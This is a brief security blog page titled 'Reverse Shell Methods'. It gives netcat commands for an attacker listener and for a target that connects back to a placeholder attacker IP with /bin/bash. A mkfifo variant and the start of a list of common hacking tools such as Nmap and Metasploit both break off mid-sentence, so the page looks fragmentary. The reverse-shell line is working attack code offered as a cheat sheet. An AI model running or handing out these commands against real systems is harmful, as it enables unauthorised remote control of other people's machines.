RatSec

RatSec Blog

Reverse Shell Methods

- Posted in Uncategorized by

Using Netcat Netcat Simple Shell: On the attacker's machine: nc -lvp 4444 On the target machine: nc <attacker_IP> 4444 -e /bin/bash Netcat with mkfifo: On the attacker's machine: nc -lvp 4444
A list of 50 tools every hacker should know: Wireshark: Network protocol analyzer. Nmap: Network discovery and security auditing tool. Metasploit: Penetration testing framework. Burp Suite: Web